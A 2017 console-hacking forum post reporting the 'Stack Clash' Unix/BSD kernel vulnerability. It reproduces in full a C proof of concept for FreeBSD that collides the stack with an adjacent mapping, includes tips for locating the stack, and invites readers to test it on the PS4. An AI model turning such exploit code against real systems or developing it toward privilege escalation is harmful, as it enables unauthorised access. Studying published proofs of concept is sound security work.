Join Us and become a Member for a Verified Badge to access private areas with the latest PS4 PKGs.
PS4 CFW and Hacks       Thread starter FabOne       Start date Jun 20, 2017 at 1:30 PM       26      
Status
Not open for further replies.
Following the recently reported Spread Overflow Exploit WebKit Bugs and PS4 MEMEs, a new massive vulnerability in Linux-Kernel, FreeBSD, OpenBSD, Solaris and Unix-based OSes called "Stack Clash" was rediscovered and can be used to gain root privileges on the affected systems. :geek:

Here are some related links with details on the Stack Clash bug:
According to PS4 developers it's currently untested on the PlayStation 4, so if anyone gives it a try let us know your results in this ongoing discussion thread.
Download: 001-stackclash.c
Code:
/*-
 * Copyright (c) 2017 Shawn Webb <[email protected]>
 * All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above
 *    copyright notice, this list of conditions and the following
 *    disclaimer.
 * 2. Redistributions in binary form must reproduce the above
 *    copyright notice, this list of conditions and the following
 *    disclaimer in the documentation and/or other materials
 *    provided with the distribution.
 * 3. The name of the author may not be used to endorse or promote
 *    products derived from this software without specific prior
 *    written permission.
 *
 * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
 * CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
 * INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
 * MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
 * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
 * CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
 * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
 * LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
 * USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
 * AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
 * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
 * ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
 * POSSIBILITY OF SUCH DAMAGE.
 *
 * Stack Clash PoC for FreeBSD.
 *
 * Compile: clang -O0 -fPIE -pie -lprocstat -o 001-stackclash 001-stackclash.c
 *
 * Note: If the security.bsd.unprivileged_proc_debug sysctl node is
 * set to 0, then this PoC as it's written requires root privileges.
 * Since FreeBSD lacks ASLR, you can simply gut out the libprocstat
 * integration and hardcode the stack address (be sure to use the
 * macros to round down to the bottom of the page). There are other
 * tricks you can do to find the stack address. Do what suits you
 * best.
 */

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>

#include <sys/types.h>
#include <sys/param.h>
#include <sys/queue.h>
#include <sys/user.h>
#include <sys/sysctl.h>
#include <sys/mman.h>
#include <libprocstat.h>

unsigned char *
func(void)
{
	unsigned char buf[16];
	int i;

	for (i=0; i < sizeof(buf)-1; i++)
		if (buf[i] == 0x41 && buf[i+1] == 0x41)
			return (buf+i);

	return func();
}

int
main(int argc, char *argv[])
{
	struct procstat *ps;
	struct kinfo_proc *p;
	struct kinfo_vmentry *vm;
	unsigned int i, cnt;
	void *stack_start, *stack_end;
	unsigned char *map, *found;

	stack_start = stack_end = NULL;

	cnt = 0;

	ps = procstat_open_sysctl();
	if (ps == NULL) {
		perror("procstat_open_sysctl");
		return (1);
	}

	p = procstat_getprocs(ps, KERN_PROC_PID, getpid(), &cnt);
	if (cnt == 0) {
		perror("procstat_getprocs");
		return (1);
	}

	cnt = 0;
	vm = procstat_getvmmap(ps, p, &cnt);
	if (cnt == 0) {
		perror("procstat_getvmmap");
		return (1);
	}

	for (i=0; i<cnt; i++) {
		if (vm[i].kve_flags & KVME_FLAG_GROWS_DOWN) {
			stack_start = (void *)vm[i].kve_start;
			stack_end = (void *)vm[i].kve_end;
		}
	}

	if (stack_start == NULL)
		return (1);

	map = mmap(stack_start - (PAGE_SIZE * 2), PAGE_SIZE,
	    PROT_READ | PROT_WRITE, MAP_FIXED | MAP_SHARED
	    | MAP_ANON, -1, 0);

	if (map == (void *)MAP_FAILED) {
		perror("mmap");
		return (1);
	}

	printf("Mapping is at 0x%016lx\n", (unsigned long)map);
	printf("Stack start is at 0x%016lx\n", (unsigned long)stack_start);

	for (i=0; i < PAGE_SIZE; i++)
		map[i] = 0x41;

	found = func();
	if (found != NULL)
		printf("Found 0x41 at %p\n", found);

	return (0);
}
Thanks to @kazookid0 and @X41 for the heads-up in the PSXHAX Shoutbox on this news last night! :thumbup:
Stack Clash Vulnerability in Linux, FreeBSD, OpenBSD & Unix OSes.jpg
 

Comments

useless... because its already patched on new version

They still wont release anything. Its not about waiting for an exploit to be patched before they release. Its about not letting a kernel exploit get into the hands of the public. It seems that's no longer sony's job anymore.
 
Even if this is useful for PS4 nothing will be released to the general public.
That all depends on if and who gets this working!
useless... because its already patched on new version
Its may or may not be patched as on wololo its saying patch some issue with FFXIV Stormblood so may have been system, if its not patch and exploitable it will be patched on next FW update.
 
Status
Not open for further replies.
Back
Top